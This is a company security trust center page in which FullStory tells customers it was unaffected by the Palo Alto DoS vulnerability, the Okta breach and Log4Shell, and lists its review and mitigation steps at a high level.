FullStory is a new kind of platform, designed to help companies answer any question they might have about their digital experience.
Built on a powerful analytics engine, FullStory connects digital interactions to the metrics that matter most to businesses. It proactively surfaces top opportunities for optimization, allowing teams to understand issues, prioritize fixes, remediate bugs, and measure the impact of changes.
With FullStory, product, engineering, and UX teams can align around their customer, break down internal information silos, and achieve company objectives together—faster. The end result? A digital experience their customers and users love.
Trust Center Updates
Response to customers
While FullStory is a fun company, we don’t play around when it comes to security and privacy. Trust is one of our core watchwords and we hold our responsibility as protectors of our customers' information in the highest regard.
FullStory does not use any Palo Alto services to deliver our product, and are not affected by this vulnerability.
Palo Alto DoS Vulnerability Background
To learn more on the background of the vulnerability: https://security.paloaltonetworks.com/CVE-2022-0028
Response to customers
While FullStory is a fun company, we don’t play around when it comes to security and privacy. Trust is one of our core watchwords and we hold our responsibility as protectors of our customers' information in the highest regard. FullStory was NOT one of the impacted customers of the Okta breach. Below is some additional information regarding the background, cause, and remediation steps we took regarding the Okta breach in order to maintain the trust you have in our company.
Okta Breach Background
To learn more on the background of the breach: https://www.okta.com/blog/2022/04/okta-concludes-its-investigation-into-the-january-2022-compromise/.
Okta detected an unsuccessful attempt to compromise the account of their third-party engineer. Okta alerted the third party provider, terminated the user’s active Okta sessions, and suspended the user’s account. Okta states there is no impact to Auth0, HIPAA, and FedRAMP customers.
Okta stated that the potential impact to customers is limited to the access that support engineers have. Upon conclusion of their third parties forensic exam Okta determined 366 customers were impacted.
FullStory & Okta Relationship Transparency Summary:
FullStory uses Okta as our single sign-on (SSO) provider. Using a SSO provider helps to streamline and secure access management for our employees to authorized systems and terminate their access upon job role change or if they exit the company. This in turn keeps our systems safe from unauthorized access or privilege creep, essentially where someone gets more access than they need when moving positions internally.
FullStory Response & Actions to Okta Breach
FullStory immediately contacted our Okta representative to inquire if we were one of the 366 customers that were impacted on March 22 2022. Okta confirmed that FullStory was not an impacted customer. FullStory independently confirmed that our systems were not compromised by completing the following additional steps:
- Reviewed our Okta audit logs to our superuser/admin accounts to look for any suspicious activity.
- Verified that no privileged accounts were created around the time of the suspected breach (January 21, 2022) that we did not create ourselves.
- Conducted assessments of our critical third-parties. This included developing a due diligence questionnaire on breach response. After concluding our assessment we did not identify any of our critical third parties who were affected by the Okta breach.
FullStory was not impacted by the Okta breach. Further we did not discover any security issues and did not identify any of our critical third parties as being an Okta customer impacted by the breach.
Response to customers
While FullStory is a fun company, we don’t play around when it comes to security and privacy. Trust is one of our core watchwords and we hold our responsibility as protectors of our customers' information and protection of our services in the highest regard. FullStory did NOT find any indicators of compromise that would indicate a successful attack of our systems. Below is some additional information regarding the background, cause, and remediation steps we took regarding the Log4j vulnerability in order to maintain the trust you have in our company.
Log4Shell Vulnerability Background
On December 9, 2021, security researchers discovered a flaw in the code of a software library used for logging. The software library, Log4j, is built on a popular coding language, Java, that has widespread use in other software and applications used worldwide. This flaw in Log4j is estimated to be present in over 100 million instances globally. This vulnerability and associated attacks against it are being characterized as Log4Shell in the cybersecurity community.
The flaw, also known as a vulnerability by the security community, was rated a 10 out of 10 on the Common Vulnerability Scoring System, or CVSS, due to the potential impact that it can have if leveraged by attackers. Details of the vulnerability can be found in the National Vulnerability Database (NVD) under the heading CVE-2021-44228.
As of Dec. 14, researchers discovered that the fix developed for CVE-2021-44228 was incomplete and the vendor, Apache, released a new fix. On Dec. 17, two new issues were confirmed and the next day, Apache released another fix. We expect this cycle of vulnerability-fix vulnerability-fix will continue as attackers and researchers continue to focus on Log4j. For more information including recommended remediation actions and resources: https://www.cisecurity.org/log4j-zero-day-vulnerability-response
FullStory Response & Actions to Log4j
FullStory worked diligently to ensure that our environment is safe from exploitation and that we have deployed all mitigating measures possible. Keeping customer data safe is our highest priority and our security team is working hard to ensure it remains safe and secure.
Once we became aware of this vulnerability we immediately took steps to determine if our systems had been exploited by CVE-2021-44228. We had found no Indicators of Compromise within our infrastructure to suggest a successful attack had taken place.
In accordance with our defense in depth strategy, we deployed mitigations to prevent a successful attack. Below is a list of the mitigation actions we took:
- Updated our web-application firewall (WAF) rules
- Ensured our WAF agents were fully patched
- Reviewed our code to ensure we were properly sanitizing user input within our application layer
- Tested various permutations of the exploit’s payload against this layered defense
- The code paths that would be vulnerable to this exploit are not exposed directly to the internet so any payloads must first pass through our layered defenses rendering them benign.
- Created a Log4j questionnaire to send to our data processors and applicable third-parties in order to complete a security assessment.
- Confirmed the security posture of our applicable third-parties and data processors in regards to CVE-2021-44228 was adequate.
Conclusion & Update
FullStory was not impacted by the Log4j vulnerability.
Currently we are patched against this vulnerability up to Log4j v2.16 and will continue to monitor the ecosystem for any new variations of this exploit to ensure we stay one step ahead of threat actors.
Completed assessments of our third-parties and data processors and found no non-compliance with remediation efforts or any parties that were vulnerable.
In regards to CVE-2021-45046, we performed an investigation and determined that our implementation was unaffected by this new variant of the Log4j vulnerability.
To protect against any potential future exploits see plan to roll out Log4j v2.17.1 on 1/12/22.
As an organization that is security conscious and values security, we are excited to announce the official launch of the FullStory Security Trust Center. By using this portal, you can request access to our compliance documents, review our standardized questionnaires such as the SIG and gain a general understanding of our security posture.
Over time, our team will be making changes to this portal as we implement new tools and processes in our environment. You can use the Subscribe button to receive email notifications for when our team has an important update, such as if we have an updated compliance report or if we have a status update regarding a major security vulnerability that has been recently discovered.
-The FullStory Security Compliance Team